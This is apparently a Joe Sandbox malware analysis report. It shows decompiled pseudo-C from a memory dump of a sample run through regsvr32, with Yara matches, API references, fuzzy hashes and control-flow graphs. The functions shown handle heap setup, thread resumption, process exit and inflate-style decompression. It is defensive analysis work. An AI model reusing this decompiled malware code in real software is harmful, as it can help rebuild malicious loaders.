                                                                                                                                                                        						_t16 = E049ED804( *_t7); // executed
                                                                                                                                                                        						__eflags = _t16;
                                                                                                                                                                        						_t17 =  *0x49ff81c; // 0x4befbe8
                                                                                                                                                                        						if(_t16 != 0) {
                                                                                                                                                                        							__eflags =  *((intOrPtr*)(_t17 + 0x214)) - 3;
                                                                                                                                                                        							if( *((intOrPtr*)(_t17 + 0x214)) != 3) {
                                                                                                                                                                        								L10:
                                                                                                                                                                        								__eflags = 0;
                                                                                                                                                                        								return 0;
                                                                                                                                                                        							}
                                                                                                                                                                        							L9:
                                                                                                                                                                        							E049E35A1();
                                                                                                                                                                        							goto L10;
                                                                                                                                                                        						}
                                                                                                                                                                        						 *((intOrPtr*)(_t17 + 0xa4)) = 1;
                                                                                                                                                                        						L6:
                                                                                                                                                                        						_t20 =  *0x49ff81c; // 0x4befbe8
                                                                                                                                                                        						__eflags =  *((intOrPtr*)(_t20 + 0x214)) - 3;
                                                                                                                                                                        						if(__eflags == 0) {
                                                                                                                                                                        							goto L9;
                                                                                                                                                                        						}
                                                                                                                                                                        						E049E611B(_t25, _t26, __eflags, _t32);
                                                                                                                                                                        						goto L10;
                                                                                                                                                                        					}
                                                                                                                                                                        					 *((intOrPtr*)(_t26 + 0xa4)) = 1;
                                                                                                                                                                        					goto L6;
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t13 + 1;
                                                                                                                                                                        			}












                                                                                                                                                                        APIs
                                                                                                                                                                        • GetOEMCP.KERNEL32 ref: 049E629D
                                                                                                                                                                          • Part of subcall function 049EDF3D: GetCurrentProcessId.KERNEL32 ref: 049EDF64
                                                                                                                                                                          • Part of subcall function 049EDF3D: GetLastError.KERNEL32 ref: 049EE05E
                                                                                                                                                                          • Part of subcall function 049EDF3D: GetSystemMetrics.USER32(00001000), ref: 049EE06E
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CurrentErrorLastMetricsProcessSystem
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1196160345-0
                                                                                                                                                                        • Opcode ID: 860c676465053ac40e45eaa149aac20a8df8e32f185c25850d507da149373425
                                                                                                                                                                        • Instruction ID: 663d9bb90c5bc4e10fb593c145fa05bf518eebfe08d543cbd53c6412f3826dcb
                                                                                                                                                                        • Opcode Fuzzy Hash: 860c676465053ac40e45eaa149aac20a8df8e32f185c25850d507da149373425
                                                                                                                                                                        • Instruction Fuzzy Hash: 3901A231208202CFD316EF6AE908BF57BE4EBAA314FD89676E405CB116C7346C42CB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        control_flow_graph 366 49ec879-49ec892 368 49ec896-49ec8a3 call 49ec862 366->368 369 49ec894-49ec895 366->369 372 49ec8b9-49ec8c4 FindCloseChangeNotification 368->372 373 49ec8a5-49ec8a8 368->373 376 49ec8c6-49ec8c8 372->376 374 49ec8aa-49ec8af 373->374 375 49ec8b5-49ec8b7 373->375 374->375 375->376
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E049EC879(void* __ecx) {
                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                        				intOrPtr _t12;
                                                                                                                                                                        				void* _t13;
                                                                                                                                                                        				void* _t14;
                                                                                                                                                                        				void* _t17;
                                                                                                                                                                        				intOrPtr _t18;
                                                                                                                                                                        				void* _t23;
                                                                                                                                                                        
                                                                                                                                                                        				_v8 = _v8 & 0x00000000;
                                                                                                                                                                        				_t12 =  *0x49ff820; // 0x4befaa0
                                                                                                                                                                        				_t13 =  *((intOrPtr*)(_t12 + 0x70))(__ecx, 8,  &_v8, __ecx);
                                                                                                                                                                        				if(_t13 != 0) {
                                                                                                                                                                        					_t14 = E049EC862(); // executed
                                                                                                                                                                        					_t23 = _t14;
                                                                                                                                                                        					if(_t23 != 0) {
                                                                                                                                                                        						FindCloseChangeNotification(_v8);
                                                                                                                                                                        						_t17 = _t23;
                                                                                                                                                                        					} else {
                                                                                                                                                                        						if(_v8 != _t14) {
                                                                                                                                                                        							_t18 =  *0x49ff818; // 0x4bef8b0
                                                                                                                                                                        							 *((intOrPtr*)(_t18 + 0x30))(_v8);
                                                                                                                                                                        						}
                                                                                                                                                                        						_t17 = 0;
                                                                                                                                                                        					}
                                                                                                                                                                        					return _t17;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					return _t13;
                                                                                                                                                                        				}
                                                                                                                                                                        			}











                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 3a0149bd7e9cae0cc59c603a10dd4c4955c804dade2a9698bca27460b384a0b4
                                                                                                                                                                        • Instruction ID: df7ec476e488eb0de627ab38f2a3435345f5e865058cee9b55d93b90c106749c
                                                                                                                                                                        • Opcode Fuzzy Hash: 3a0149bd7e9cae0cc59c603a10dd4c4955c804dade2a9698bca27460b384a0b4
                                                                                                                                                                        • Instruction Fuzzy Hash: 05F03A32A10104EBEB12DBA6DA05EAD77F8FB08745F4141B5E542E7250DB34EE01DB94
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E049E632E() {
                                                                                                                                                                        				intOrPtr _t3;
                                                                                                                                                                        
                                                                                                                                                                        				_t3 =  *0x49ff818; // 0x4bef8b0
                                                                                                                                                                        				 *((intOrPtr*)(_t3 + 0x2c))( *0x49ff83c, 0xffffffff);
                                                                                                                                                                        				ExitProcess(0);
                                                                                                                                                                        			}




                                                                                                                                                                        0x049e632e
                                                                                                                                                                        0x049e633b
                                                                                                                                                                        0x049e6345

                                                                                                                                                                        APIs
                                                                                                                                                                        • ExitProcess.KERNEL32(00000000), ref: 049E6345
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ExitProcess
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 621844428-0
                                                                                                                                                                        • Opcode ID: ad8ca7f5a1d028bc92318cf8aded79a4d312295508ffd13548c8fe700a60da3a
                                                                                                                                                                        • Instruction ID: 340bdbe9217e118cf46f9aebd9f6f4eceeea81786132ddea2ad2ce310b88a14d
                                                                                                                                                                        • Opcode Fuzzy Hash: ad8ca7f5a1d028bc92318cf8aded79a4d312295508ffd13548c8fe700a60da3a
                                                                                                                                                                        • Instruction Fuzzy Hash: 10C002713180109FC7409B64E849F443BE0EB09322F9187B2F52ADA1E9CB2498459B44
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E049E8BDE(long _a4) {
                                                                                                                                                                        				void* _t2;
                                                                                                                                                                        
                                                                                                                                                                        				_t2 = RtlAllocateHeap( *0x49ff900, 8, _a4); // executed
                                                                                                                                                                        				return _t2;
                                                                                                                                                                        			}




                                                                                                                                                                        0x049e8bec
                                                                                                                                                                        0x049e8bf3

                                                                                                                                                                        APIs
                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000008,?,?,049E959D,00000100,?,049E6507), ref: 049E8BEC
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                        • Opcode ID: 4f3b306027d9ec3a19d9bdb444c7c2b2f8fe48b9359d267b71aceb146faeb433
                                                                                                                                                                        • Instruction ID: 27743217b1509f614c5b36582542fb83de3eb6308ca2e243044411e7b677b6b0
                                                                                                                                                                        • Opcode Fuzzy Hash: 4f3b306027d9ec3a19d9bdb444c7c2b2f8fe48b9359d267b71aceb146faeb433
                                                                                                                                                                        • Instruction Fuzzy Hash: 59B0923208820CBBCB011AA5EC05B843F29F704755F044021FA0C04664CB66A8609B84
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 58%
                                                                                                                                                                        			E049EDA57(void* __ecx) {
                                                                                                                                                                        				signed int _t4;
                                                                                                                                                                        
                                                                                                                                                                        				_t4 = ResumeThread( *(__ecx + 4));
                                                                                                                                                                        				asm("sbb eax, eax");
                                                                                                                                                                        				return  ~_t4 & 0x00000001;
                                                                                                                                                                        			}




                                                                                                                                                                        0x049eda5f
                                                                                                                                                                        0x049eda67
                                                                                                                                                                        0x049eda6c

                                                                                                                                                                        APIs
                                                                                                                                                                        • ResumeThread.KERNELBASE(?,049ED8C2,?,?,00000001), ref: 049EDA5F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ResumeThread
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 947044025-0
                                                                                                                                                                        • Opcode ID: 7330c5238b5852082813cd20d006dea8f53cc561821079db075a5756552db679
                                                                                                                                                                        • Instruction ID: 25eb9ca2baae2af44d2533bb6d6a1b00632fcb7d3527546479fb3807bff4b7c0
                                                                                                                                                                        • Opcode Fuzzy Hash: 7330c5238b5852082813cd20d006dea8f53cc561821079db075a5756552db679
                                                                                                                                                                        • Instruction Fuzzy Hash: 12B092322A40019BCB004B74E80B9903BE0FB56706BD8C2F0E006C6061C32EC8868A80
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E049E8BC9() {
                                                                                                                                                                        				void* _t1;
                                                                                                                                                                        
                                                                                                                                                                        				_t1 = HeapCreate(0, 0x96000, 0); // executed
                                                                                                                                                                        				 *0x49ff900 = _t1;
                                                                                                                                                                        				return _t1;
                                                                                                                                                                        			}




                                                                                                                                                                        0x049e8bd2
                                                                                                                                                                        0x049e8bd8
                                                                                                                                                                        0x049e8bdd

                                                                                                                                                                        APIs
                                                                                                                                                                        • HeapCreate.KERNELBASE(00000000,00096000,00000000,049E6502), ref: 049E8BD2
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateHeap
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 10892065-0
                                                                                                                                                                        • Opcode ID: 65f8cc11091c0af1127f4e0efe9c563ca8fbd24a204a504a4fc3d418094d1111
                                                                                                                                                                        • Instruction ID: d721ddaa51191e935c12da674fd0e4faed842be38a7f05afe5fdb110039a9f1d
                                                                                                                                                                        • Opcode Fuzzy Hash: 65f8cc11091c0af1127f4e0efe9c563ca8fbd24a204a504a4fc3d418094d1111
                                                                                                                                                                        • Instruction Fuzzy Hash: F7B012B038A30066D6100B205C06F003D10E380B02F100021FA05982C8D7A424509504
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 91%
                                                                                                                                                                        			E049EDA6D(void* __ecx, intOrPtr _a4, signed int _a8) {
                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                        				intOrPtr _v12;
                                                                                                                                                                        				signed int _t26;
                                                                                                                                                                        				signed int _t28;
                                                                                                                                                                        				signed int* _t36;
                                                                                                                                                                        				signed int* _t39;
                                                                                                                                                                        
                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                        				_t36 = _a8;
                                                                                                                                                                        				_t28 = _t36[1];
                                                                                                                                                                        				if(_t28 != 0) {
                                                                                                                                                                        					_t39 = _t36[2];
                                                                                                                                                                        					do {
                                                                                                                                                                        						_a8 = _a8 & 0x00000000;
                                                                                                                                                                        						if(_t39[2] > 0) {
                                                                                                                                                                        							_t31 = _t39[3];
                                                                                                                                                                        							_t22 = _a4 + 0x24;
                                                                                                                                                                        							_v12 = _a4 + 0x24;
                                                                                                                                                                        							_v8 = _t39[3];
                                                                                                                                                                        							while(E049EA0A3(_t22,  *_t31) != 0) {
                                                                                                                                                                        								_t26 = _a8 + 1;
                                                                                                                                                                        								_t31 = _v8 + 4;
                                                                                                                                                                        								_a8 = _t26;
                                                                                                                                                                        								_t22 = _v12;
                                                                                                                                                                        								_v8 = _v8 + 4;
                                                                                                                                                                        								if(_t26 < _t39[2]) {
                                                                                                                                                                        									continue;
                                                                                                                                                                        								} else {
                                                                                                                                                                        								}
                                                                                                                                                                        								goto L8;
                                                                                                                                                                        							}
                                                                                                                                                                        							 *_t36 =  *_t36 |  *_t39;
                                                                                                                                                                        						}
                                                                                                                                                                        						L8:
                                                                                                                                                                        						_t39 =  &(_t39[4]);
                                                                                                                                                                        						_t28 = _t28 - 1;
                                                                                                                                                                        					} while (_t28 != 0);
                                                                                                                                                                        				}
                                                                                                                                                                        				Sleep(0xa);
                                                                                                                                                                        				return 1;
                                                                                                                                                                        			}










                                                                                                                                                                        APIs
                                                                                                                                                                        • Sleep.KERNELBASE(0000000A), ref: 049EDAD6
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Sleep
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3472027048-0
                                                                                                                                                                        • Opcode ID: 0d69a45d888026b698d1312b846e77bc61f009e97e0a5dec510da6dd95671e22
                                                                                                                                                                        • Instruction ID: 2144ee0ae3c9ab9cc165425f2006dbaec5893e837f8a6935368ac51ad23234ff
                                                                                                                                                                        • Opcode Fuzzy Hash: 0d69a45d888026b698d1312b846e77bc61f009e97e0a5dec510da6dd95671e22
                                                                                                                                                                        • Instruction Fuzzy Hash: 03111B71A04206AFEB15CF9AD585AA9B7E8EB88324F148579E85A9B310D374FA40DB40
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 81%
                                                                                                                                                                        			E049F670F(void* __edi) {
                                                                                                                                                                        				signed int _t164;
                                                                                                                                                                        				unsigned int _t172;
                                                                                                                                                                        				unsigned int _t173;
                                                                                                                                                                        				signed int _t174;
                                                                                                                                                                        				signed int _t176;
                                                                                                                                                                        				signed int _t178;
                                                                                                                                                                        				signed int _t179;
                                                                                                                                                                        				signed int _t182;
                                                                                                                                                                        				signed int _t184;
                                                                                                                                                                        				unsigned int _t185;
                                                                                                                                                                        				int _t186;
                                                                                                                                                                        				int _t194;
                                                                                                                                                                        				signed char _t200;
                                                                                                                                                                        				signed int _t207;
                                                                                                                                                                        				signed int _t208;
                                                                                                                                                                        				signed int _t209;
                                                                                                                                                                        				int _t210;
                                                                                                                                                                        				int _t222;
                                                                                                                                                                        				signed int _t227;
                                                                                                                                                                        				signed int _t235;
                                                                                                                                                                        				signed int _t251;
                                                                                                                                                                        				signed char _t252;
                                                                                                                                                                        				unsigned int _t253;
                                                                                                                                                                        				signed char _t254;
                                                                                                                                                                        				signed int* _t255;
                                                                                                                                                                        				signed int _t258;
                                                                                                                                                                        				signed int _t259;
                                                                                                                                                                        				signed int _t260;
                                                                                                                                                                        				signed int _t266;
                                                                                                                                                                        				intOrPtr _t271;
                                                                                                                                                                        				signed char _t278;
                                                                                                                                                                        				signed int _t279;
                                                                                                                                                                        				char* _t280;
                                                                                                                                                                        				signed int _t282;
                                                                                                                                                                        				signed char _t284;
                                                                                                                                                                        				signed int _t287;
                                                                                                                                                                        				signed int _t291;
                                                                                                                                                                        				int _t292;
                                                                                                                                                                        				int _t293;
                                                                                                                                                                        				int _t296;
                                                                                                                                                                        				int _t298;
                                                                                                                                                                        				int _t302;
                                                                                                                                                                        				signed int _t305;
                                                                                                                                                                        				signed char _t311;
                                                                                                                                                                        				signed char _t312;
                                                                                                                                                                        				signed char _t315;
                                                                                                                                                                        				signed char _t316;
                                                                                                                                                                        				signed int _t318;
                                                                                                                                                                        				int _t319;
                                                                                                                                                                        				int _t320;
                                                                                                                                                                        				signed char _t322;
                                                                                                                                                                        				int _t324;
                                                                                                                                                                        				int _t326;
                                                                                                                                                                        				int _t330;
                                                                                                                                                                        				signed int _t333;
                                                                                                                                                                        				signed char _t336;
                                                                                                                                                                        				signed char _t337;
                                                                                                                                                                        				signed char _t339;
                                                                                                                                                                        				int _t341;
                                                                                                                                                                        				signed int _t347;
                                                                                                                                                                        				int _t349;
                                                                                                                                                                        				intOrPtr _t350;
                                                                                                                                                                        				intOrPtr _t351;
                                                                                                                                                                        				unsigned int _t356;
                                                                                                                                                                        				unsigned int _t361;
                                                                                                                                                                        				signed int _t364;
                                                                                                                                                                        				signed int _t365;
                                                                                                                                                                        				intOrPtr _t367;
                                                                                                                                                                        				void* _t368;
                                                                                                                                                                        				intOrPtr* _t380;
                                                                                                                                                                        				void* _t381;
                                                                                                                                                                        				intOrPtr* _t389;
                                                                                                                                                                        				void* _t390;
                                                                                                                                                                        				signed int _t395;
                                                                                                                                                                        				void* _t396;
                                                                                                                                                                        				signed int _t397;
                                                                                                                                                                        				void* _t403;
                                                                                                                                                                        				void* _t405;
                                                                                                                                                                        				intOrPtr* _t412;
                                                                                                                                                                        				void* _t413;
                                                                                                                                                                        				signed int _t414;
                                                                                                                                                                        				void* _t416;
                                                                                                                                                                        				intOrPtr* _t423;
                                                                                                                                                                        				void* _t424;
                                                                                                                                                                        				unsigned int _t430;
                                                                                                                                                                        				signed int _t431;
                                                                                                                                                                        				void* _t434;
                                                                                                                                                                        				signed int* _t435;
                                                                                                                                                                        				void* _t439;
                                                                                                                                                                        
                                                                                                                                                                        				 *((intOrPtr*)(__edi + 0x56))();
                                                                                                                                                                        				asm("pushfd");
                                                                                                                                                                        				_t435 = _t434 - 0x40;
                                                                                                                                                                        				asm("cld");
                                                                                                                                                                        				_t395 = _t435[0x16];
                                                                                                                                                                        				_t367 =  *((intOrPtr*)(_t395 + 0x1c));
                                                                                                                                                                        				_t164 =  *_t395;
                                                                                                                                                                        				_t435[0xb] = _t164;
                                                                                                                                                                        				_t435[5] =  *((intOrPtr*)(_t395 + 4)) + _t164 - 0xb;
                                                                                                                                                                        				_t271 =  *((intOrPtr*)(_t395 + 0x10));
                                                                                                                                                                        				_t251 =  *(_t395 + 0xc);
                                                                                                                                                                        				_t435[0xf] = _t251;
                                                                                                                                                                        				_t435[0xa] =  ~(_t435[0x17] - _t271) + _t251;
                                                                                                                                                                        				_t435[4] = _t271 - 0x101 + _t251;
                                                                                                                                                                        				_t435[2] =  *(_t367 + 0x4c);
                                                                                                                                                                        				_t435[3] =  *(_t367 + 0x50);
                                                                                                                                                                        				 *_t435 = (1 <<  *(_t367 + 0x54)) - 1;
                                                                                                                                                                        				_t435[1] = (1 <<  *(_t367 + 0x58)) - 1;
                                                                                                                                                                        				_t172 =  *(_t367 + 0x28);
                                                                                                                                                                        				_t347 =  *(_t367 + 0x34);
                                                                                                                                                                        				_t435[0xd] = _t172;
                                                                                                                                                                        				_t435[0xc] =  *(_t367 + 0x30);
                                                                                                                                                                        				_t435[0xe] = _t347;
                                                                                                                                                                        				_t430 =  *(_t367 + 0x38);
                                                                                                                                                                        				_t252 =  *(_t367 + 0x3c);
                                                                                                                                                                        				_t396 = _t435[0xb];
                                                                                                                                                                        				_t278 = _t435[5];
                                                                                                                                                                        				if(_t278 > _t396) {
                                                                                                                                                                        					L2:
                                                                                                                                                                        					if((_t396 & 0x00000003) != 0) {
                                                                                                                                                                        						_t396 = _t396 + 1;
                                                                                                                                                                        						_t278 = _t252;
                                                                                                                                                                        						_t252 = _t252 + 8;
                                                                                                                                                                        						_t172 = 0 << _t278;
                                                                                                                                                                        						_t430 = _t430 | _t172;
                                                                                                                                                                        						goto L2;
                                                                                                                                                                        					}
                                                                                                                                                                        					goto L4;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t341 = _t278 + 0xb - _t396;
                                                                                                                                                                        					_t172 = memset(_t396 + _t341 + _t341, 0, memcpy( &(_t435[7]), _t396, _t341) << 0);
                                                                                                                                                                        					_t435 =  &(_t435[6]);
                                                                                                                                                                        					_t278 = 0;
                                                                                                                                                                        					_t396 =  &(_t435[7]);
                                                                                                                                                                        					_t435[5] = _t396;
                                                                                                                                                                        					L4:
                                                                                                                                                                        					_t368 = _t435[0xf];
                                                                                                                                                                        					while(1) {
                                                                                                                                                                        						_t439 =  *0x49fe040 - 2;
                                                                                                                                                                        						if(_t439 == 0) {
                                                                                                                                                                        							break;
                                                                                                                                                                        						}
                                                                                                                                                                        						if(_t439 > 0) {
                                                                                                                                                                        							do {
                                                                                                                                                                        								if(_t252 <= 0xf) {
                                                                                                                                                                        									asm("lodsw");
                                                                                                                                                                        									_t322 = _t252;
                                                                                                                                                                        									_t252 = _t252 + 0x10;
                                                                                                                                                                        									_t430 = _t431 | 0 << _t322;
                                                                                                                                                                        								}
                                                                                                                                                                        								_t173 =  *(_t435[2] + ( *_t435 & _t430) * 4);
                                                                                                                                                                        								while(1) {
                                                                                                                                                                        									_t253 = _t252 - _t173;
                                                                                                                                                                        									_t431 = _t430 >> _t173;
                                                                                                                                                                        									if(_t173 == 0) {
                                                                                                                                                                        										asm("stosb");
                                                                                                                                                                        										goto L22;
                                                                                                                                                                        									}
                                                                                                                                                                        									_t356 = _t173 >> 0x10;
                                                                                                                                                                        									_t311 = _t173;
                                                                                                                                                                        									if((_t173 & 0x00000010) == 0) {
                                                                                                                                                                        										if((_t173 & 0x00000040) != 0) {
                                                                                                                                                                        											L97:
                                                                                                                                                                        											if((_t173 & 0x00000020) == 0) {
                                                                                                                                                                        												_t280 = "invalid literal/length code";
                                                                                                                                                                        												_t350 = 0x1a;
                                                                                                                                                                        											} else {
                                                                                                                                                                        												_t280 = 0;
                                                                                                                                                                        												_t350 = 0xb;
                                                                                                                                                                        											}
                                                                                                                                                                        											L101:
                                                                                                                                                                        											_t174 = _t435[0x16];
                                                                                                                                                                        											if(_t280 != 0) {
                                                                                                                                                                        												 *(_t174 + 0x18) = _t280;
                                                                                                                                                                        											}
                                                                                                                                                                        											 *((intOrPtr*)( *((intOrPtr*)(_t174 + 0x1c)))) = _t350;
                                                                                                                                                                        											goto L104;
                                                                                                                                                                        										}
                                                                                                                                                                        										_t173 =  *(_t435[2] + (((0x00000001 << _t311) - 0x00000001 & _t431) + _t356) * 4);
                                                                                                                                                                        										continue;
                                                                                                                                                                        									}
                                                                                                                                                                        									_t312 = _t311 & 0x0000000f;
                                                                                                                                                                        									if(_t312 != 0) {
                                                                                                                                                                        										if(_t253 < _t312) {
                                                                                                                                                                        											asm("lodsw");
                                                                                                                                                                        											_t339 = _t253;
                                                                                                                                                                        											_t253 = _t253 + 0x10;
                                                                                                                                                                        											_t431 = _t431 | 0 << _t339;
                                                                                                                                                                        											_t312 = _t339;
                                                                                                                                                                        										}
                                                                                                                                                                        										_t253 = _t253 - _t312;
                                                                                                                                                                        										_t235 = (0x00000001 << _t312) - 0x00000001 & _t431;
                                                                                                                                                                        										_t431 = _t431 >> _t312;
                                                                                                                                                                        										_t356 = _t356 + _t235;
                                                                                                                                                                        									}
                                                                                                                                                                        									_t435[6] = _t356;
                                                                                                                                                                        									if(_t253 <= 0xf) {
                                                                                                                                                                        										asm("lodsw");
                                                                                                                                                                        										_t337 = _t253;
                                                                                                                                                                        										_t253 = _t253 + 0x10;
                                                                                                                                                                        										_t431 = _t431 | 0 << _t337;
                                                                                                                                                                        									}
                                                                                                                                                                        									_t200 =  *(_t435[3] + (_t435[1] & _t431) * 4);
                                                                                                                                                                        									while(1) {
                                                                                                                                                                        										_t361 = _t200 >> 0x10;
                                                                                                                                                                        										_t253 = _t253 - _t200;
                                                                                                                                                                        										_t431 = _t431 >> _t200;
                                                                                                                                                                        										_t315 = _t200;
                                                                                                                                                                        										if((_t200 & 0x00000010) != 0) {
                                                                                                                                                                        											break;
                                                                                                                                                                        										}
                                                                                                                                                                        										if((_t200 & 0x00000040) != 0) {
                                                                                                                                                                        											L96:
                                                                                                                                                                        											_t280 = "invalid distance code";
                                                                                                                                                                        											_t350 = 0x1a;
                                                                                                                                                                        											goto L101;
                                                                                                                                                                        										}
                                                                                                                                                                        										_t200 =  *(_t435[3] + (((0x00000001 << _t315) - 0x00000001 & _t431) + _t361) * 4);
                                                                                                                                                                        									}
                                                                                                                                                                        									_t316 = _t315 & 0x0000000f;
                                                                                                                                                                        									if(_t316 == 0) {
                                                                                                                                                                        										if(_t361 != 1 || _t435[0xa] == _t368) {
                                                                                                                                                                        											L38:
                                                                                                                                                                        											_t435[0xb] = _t396;
                                                                                                                                                                        											_t207 = _t368 - _t435[0xa];
                                                                                                                                                                        											if(_t207 < _t361) {
                                                                                                                                                                        												_t208 = _t435[0xd];
                                                                                                                                                                        												_t318 =  ~_t207;
                                                                                                                                                                        												_t414 = _t435[0xe];
                                                                                                                                                                        												if(_t208 < _t361) {
                                                                                                                                                                        													L100:
                                                                                                                                                                        													_t396 = _t435[0xb];
                                                                                                                                                                        													_t280 = "invalid distance too far back";
                                                                                                                                                                        													_t350 = 0x1a;
                                                                                                                                                                        													goto L101;
                                                                                                                                                                        												}
                                                                                                                                                                        												_t319 = _t318 + _t361;
                                                                                                                                                                        												if(_t435[0xc] != 0) {
                                                                                                                                                                        													_t209 = _t435[0xc];
                                                                                                                                                                        													if(_t319 <= _t209) {
                                                                                                                                                                        														_t416 = _t414 + _t209 - _t319;
                                                                                                                                                                        														_t210 = _t435[6];
                                                                                                                                                                        														if(_t210 > _t319) {
                                                                                                                                                                        															_t210 = memcpy(_t368, _t416, _t319);
                                                                                                                                                                        															_t435 =  &(_t435[3]);
                                                                                                                                                                        															_t368 = _t416 + _t319 + _t319;
                                                                                                                                                                        															_t416 = _t368 - _t361;
                                                                                                                                                                        														}
                                                                                                                                                                        													} else {
                                                                                                                                                                        														_t416 = _t414 + _t435[0xd] + _t209 - _t319;
                                                                                                                                                                        														_t324 = _t319 - _t209;
                                                                                                                                                                        														_t210 = _t435[6];
                                                                                                                                                                        														if(_t210 > _t324) {
                                                                                                                                                                        															_t210 = memcpy(_t368, _t416, _t324);
                                                                                                                                                                        															_t435 =  &(_t435[3]);
                                                                                                                                                                        															_t368 = _t416 + _t324 + _t324;
                                                                                                                                                                        															_t416 = _t435[0xe];
                                                                                                                                                                        															_t326 = _t435[0xc];
                                                                                                                                                                        															if(_t210 > _t326) {
                                                                                                                                                                        																_t210 = memcpy(_t368, _t416, _t326);
                                                                                                                                                                        																_t435 =  &(_t435[3]);
                                                                                                                                                                        																_t368 = _t416 + _t326 + _t326;
                                                                                                                                                                        																_t416 = _t368 - _t361;
                                                                                                                                                                        															}
                                                                                                                                                                        														}
                                                                                                                                                                        													}
                                                                                                                                                                        												} else {
                                                                                                                                                                        													_t416 = _t414 + _t208 - _t319;
                                                                                                                                                                        													_t210 = _t435[6];
                                                                                                                                                                        													if(_t210 > _t319) {
                                                                                                                                                                        														_t210 = memcpy(_t368, _t416, _t319);
                                                                                                                                                                        														_t435 =  &(_t435[3]);
                                                                                                                                                                        														_t368 = _t416 + _t319 + _t319;
                                                                                                                                                                        														_t416 = _t368 - _t361;
                                                                                                                                                                        													}
                                                                                                                                                                        												}
                                                                                                                                                                        												_t320 = _t210;
                                                                                                                                                                        												memcpy(_t368, _t416, _t320);
                                                                                                                                                                        												_t435 =  &(_t435[3]);
                                                                                                                                                                        												_t368 = _t416 + _t320 + _t320;
                                                                                                                                                                        												_t396 = _t435[0xb];
                                                                                                                                                                        												goto L22;
                                                                                                                                                                        											}
